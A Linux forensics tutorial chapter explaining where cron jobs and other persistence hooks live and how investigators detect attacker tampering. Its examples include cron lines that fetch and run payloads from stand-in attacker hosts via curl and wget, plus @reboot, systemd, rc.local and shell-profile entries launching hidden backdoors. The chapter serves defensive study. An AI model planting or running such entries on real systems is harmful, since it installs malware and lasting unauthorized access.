Cron jobs and persistence mechanisms are critical components in Linux forensics because attackers frequently abuse them to maintain long-term access, automate malicious tasks, or hide backdoors. Investigating cron activity and persistence techniques allows forensic analysts to detect unauthorized modifications, scheduled malware executions, and traces of an attacker’s foothold on the system.
This chapter explains how cron works, where cron jobs are stored, common persistence paths used by attackers, and how to analyze these artifacts during a forensic investigation.
Understanding Cron in Linux
Cron is a time-based job scheduler used to automate tasks such as backups, updates, cleanups, and application maintenance. It runs jobs according to predefined schedules written in cron syntax.
Because cron executes tasks automatically and often with elevated privileges, attackers frequently exploit it for persistence and automation.
Locations of Cron Jobs
Cron jobs exist in multiple locations depending on whether they are user-level or system-level.
1. System-Wide Cron Jobs
/etc/crontab
The primary system-wide cron configuration file.
Contents include:
-
Scheduled scripts
-
User accounts associated with jobs
-
System-maintained tasks
Forensic value:
-
Detect unauthorized scheduled tasks
-
Identify scripts created by attackers
-
Trace system-level persistence
/etc/cron.d/
Contains cron definitions installed by packages or administrators.
Each file here represents a different scheduled job.
Attackers may drop malicious cron files here because:
-
They blend with legitimate entries
-
They persist across reboots
-
They execute with root privileges (if configured)
/etc/cron.hourly/
/etc/cron.daily/
/etc/cron.weekly/
/etc/cron.monthly/
These directories contain scripts executed at predefined intervals by system cron.
Forensic value:
-
Look for suspicious files or scripts
-
Check for recently modified scripts
-
Identify shell scripts downloaded or created by attackers
2. User-Level Cron Jobs
Each user may have their own cron jobs stored in:
/var/spool/cron/crontabs/<username> (Debian/Ubuntu)
/var/spool/cron/<username> (RHEL/CentOS)
View using the command:
crontab -l -u <user>
Forensic value:
-
Identify persistence in a specific user account
-
Detect commands run as non-root attackers
-
Look for strange user accounts running automated tasks
What a Typical Cron Job Looks Like
Cron job format:
* * * * * command_to_execute
| | | | |
| | | | ----- Day of week
| | | ------- Month
| | --------- Day of month
| ---------- Hour
----------- Minute
Attackers may use cron entries such as:
*/5 * * * * curl http://malicious.site/payload.sh | bash
@reboot /tmp/.hidden/payload
0 * * * * /usr/bin/python3 /etc/.update/update.py
Such entries automate the execution of malware, backdoors, or update mechanisms.
Common Persistence Techniques in Linux
Attackers rarely rely on a single persistence method. They combine multiple techniques to ensure access remains even if one method is removed.
Below are the most common persistence vectors found during forensic investigations.
1. Cron Job Persistence
Attackers add malicious cron entries to:
-
/etc/crontab -
/etc/cron.d/ -
/var/spool/cron/crontabs/ -
crontab -efor specific users
Examples:
* * * * * /usr/bin/wget http://attacker/malware -O /tmp/x; chmod +x /tmp/x; /tmp/x
@reboot /usr/local/bin/.hidden_script
2. Systemd Service Persistence
Systemd services can run programs at boot time.
Locations:
-
/etc/systemd/system/ -
/lib/systemd/system/
Attackers create services such as:
[Service]
ExecStart=/usr/bin/python3 /etc/rc.local/.malware
Look for unusual names like sysupdate.service, network-helper.service, or misspelled system services.
3. rc.local Persistence
File:
/etc/rc.local
Executed at every system boot (on distros that support it).
Example persistence:
/bin/bash /opt/.hidden/malware.sh &
4. Bash Profile / Shell Startup Files
Modified files:
-
~/.bashrc -
~/.bash_profile -
~/.profile -
/etc/profile
Attackers may add:
/usr/bin/python3 /tmp/backdoor.py &
These execute when a user logs in.
5. SSH Key-Based Persistence
Attackers add their keys to:
~/.ssh/authorized_keys
This allows passwordless login.
Forensic value:
-
Look for unauthorized or duplicated keys
-
Keys belonging to unknown users
-
Keys created at odd times
6. Scheduled At Jobs
Commands scheduled via at:
at now + 1 minute
Jobs stored in:
/var/spool/at/
Used for one-time execution of malware or cleanup scripts.
7. Startup Scripts
Some distros still use:
-
/etc/init.d/ -
/etc/inittab
Attackers may:
-
Add new scripts
-
Modify runlevels
-
Insert malicious commands
8. Kernel Module Insertion
Attackers insert malicious kernel modules:
-
/lib/modules/<version>/ -
dmesglogs show module loading
Dangerous because rootkits often hide here.
Forensic Techniques for Detecting Persistence
-
List systemd services
systemctl list-unit-files | grep enabled
-
Check all cron directories
ls -al /etc/cron*
ls -al /var/spool/cron/crontabs/
-
Inspect modification timestamps using
stat -
Review suspicious scripts
-
Analyze network connections made by cron jobs
-
Check
/tmpand hidden directories -
Search for unknown users
-
Compare binaries with known-good hashes
-
Inspect SSH keys for unauthorized access
-
Check for hidden systemd services
Signs of Malicious Persistence
-
Scripts in
/tmp,/dev/shm,/var/tmp -
Cron jobs executing every minute (high-frequency)
-
Suspicious URLs in cron entries
-
Base64-encoded commands
-
Misspelled service names
-
Files with odd permissions (777)
-
Recently modified startup files
-
Python, Perl, or Bash scripts in hidden folders
Summary
Cron jobs and persistence techniques are among the most common methods attackers use to maintain control over a compromised Linux system. By thoroughly examining cron directories, systemd services, startup scripts, SSH keys, shell profiles, and scheduled tasks, investigators can uncover hidden backdoors, malicious automation, and unauthorized access. Understanding these persistence mechanisms is essential for accurate detection, analysis, and remediation of intrusions on Linux systems.